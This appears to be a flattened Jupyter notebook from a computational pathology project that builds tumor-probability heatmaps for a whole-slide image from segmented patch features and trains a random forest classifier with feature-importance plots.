tumor005_segdf = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_segmented.fixed.segmented.tsv')
tumor005_segdf.head()
n_samples = len(tumor005_segdf.index)
n_samples
slide = WSIReader(wsi, 40)
n_cols = int(slide.dimensions[0] / patchsize)
n_rows = int(slide.dimensions[1] / patchsize)
assert n_rows * n_cols == n_samples, 'Some division error;'
print('Total: {}'.format(n_samples))
"""
def generate_rows(samples, num_samples, batch_size=32):
while True: # Loop forever so the generator never terminates
for offset in range(0, num_samples, batch_size):
batch_samples = samples.iloc[offset:offset + batch_size]
is_tissue = batch_samples.is_tissue.tolist()
is_tumor = batch_samples.is_tumor.astype('int32').tolist()
features = []
batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
for _, batch_sample in batch_samples.iterrows():
row = batch_samples.values
features.append(row)
X_train = np.array(features)
y_train = np.array(labels)
yield X_train, y_train
"""
def generate_rows(samples, num_samples, batch_size=1):
while True: # Loop forever so the generator never terminates
for offset in range(0, num_samples, batch_size):
batch_samples = samples.iloc[offset:offset + batch_size]
#is_tissue = batch_samples.is_tissue.tolist()
#is_tumor = batch_samples.is_tumor.astype('int32').tolist()
features = []
labels = []
#batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
for _, batch_sample in batch_samples.iterrows():
row = batch_sample.values
label = int(batch_sample.is_tumor)
if batch_sample.is_tissue:
feature = pd.read_table(os.path.join('/Z/personal-folders/interns/saket/github/pyvirchow', batch_sample.segmented_tsv))
feature = feature.drop(columns=['is_tumor', 'is_tissue'])
assert len(feature.columns) == 46
features.append(feature.loc[0].values)
else:
values = [0.0]*46
features.append(values)
labels.append(label)
X_train = np.array(features, dtype=np.float32)
y_train = np.array(labels)
#print(X_train)
#print(y_train)
yield X_train, y_train
predicted_thumbnails = list()
batch_size = 1
"""
sess.run(testing_init_op)
while True:
try:
testing_features_batch, testing_label_batch = sess.run(testing_next_batch)
except tf.errors.OutOfRangeError:
break
preds = sess.run(infer_op,
feed_dict={X: testing_features_batch})
predicted_thumbnails.append(preds)
"""
true_labels = []
for offset in tqdm_notebook(list(range(0, n_samples, batch_size))):
batch_samples = tumor005_segdf.iloc[offset:offset + batch_size]
X_test, true_label = next(
generate_rows(batch_samples, batch_size))
true_labels.append(true_label)
if batch_samples.is_tissue.nunique(
) == 1 and batch_samples.iloc[0].is_tissue == False:
# all patches in this row do not have tissue, skip them all
#predicted_thumbnails.append(
# np.zeros(batch_size, dtype=np.float32))
predicted_thumbnails.append(0)
else:
preds = sess.run(infer_op,
feed_dict={X: X_test})
predicted_thumbnails.append(preds[0][1])
predicted_thumbnails = np.asarray(predicted_thumbnails)
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf'
saveto = os.path.join(savedir, 'tumor_005.job.pickle')
os.makedirs(savedir, exist_ok=True)
output_thumbnail_preds = predicted_thumbnails.reshape(
n_rows, n_cols)
joblib.dump(output_thumbnail_preds, saveto)
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds, cmap='coolwarm')
plt.colorbar(x)
fig.tight_layout()
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds > 0.5, cmap='gray')
#plt.colorbar(x)
fig.tight_layout()
saver = tf.train.Saver()
saver.save(sess, '/Z/personal-folders/interns/saket/github/pyvirchow/models/random_forest_all_train.tf.model')
df = pd.read_table('../data/patch_df/tumor_001_with_mask_segmented.segmented.tsv')
df1 = df[df.segmented_tsv==df.segmented_tsv]
df1.head()
x = pd.read_table(df1.loc[693, 'segmented_tsv'])
x
x = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_segmented_tumor001/tumor_001_75_63.segmented_summary.tsv')
x
train_samples
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from sklearn.datasets import make_blobs
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
clf = RandomForestClassifier(n_jobs=-1, random_state=0)
features = train_samples.columns
clf.fit(train_samples.loc[:, features[1:]], train_samples.is_tumor)
predictions = clf.predict(validation_samples.loc[:, features[1:]])
print ("Train Accuracy :: {} ".format(accuracy_score(train_samples.is_tumor,
clf.predict(train_samples.loc[:, features[1:]]))))
print ("Test Accuracy :: {} ".format(accuracy_score(validation_samples.is_tumor,
predictions)))
importances = clf.feature_importances_
indices = np.argsort(importances)[::-1]
importances
for f in range(train_samples.shape[1]-1):
print("%d. feature %s (%f)" % (f + 1, train_samples.columns[indices[f]+1],
importances[indices[f]]))
std = np.std([tree.feature_importances_ for tree in clf.estimators_],
axis=0)
sns.set_context('talk', font_scale=2)
sns.set_style('white')
fig, ax = plt.subplots(figsize=(10, 10))
ax.set_title('Feature importances')
ax.barh(list(features[1:][indices])[:15],list(importances[indices])[:15],
yerr=list(std[indices])[:15], align="center")
#ax.set_xticks(range(X.shape[1]), indices)
fig.tight_layout()
fig.savefig('presentation_images/rf_feature_importances.pdf')
###Output
_____no_output_____ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.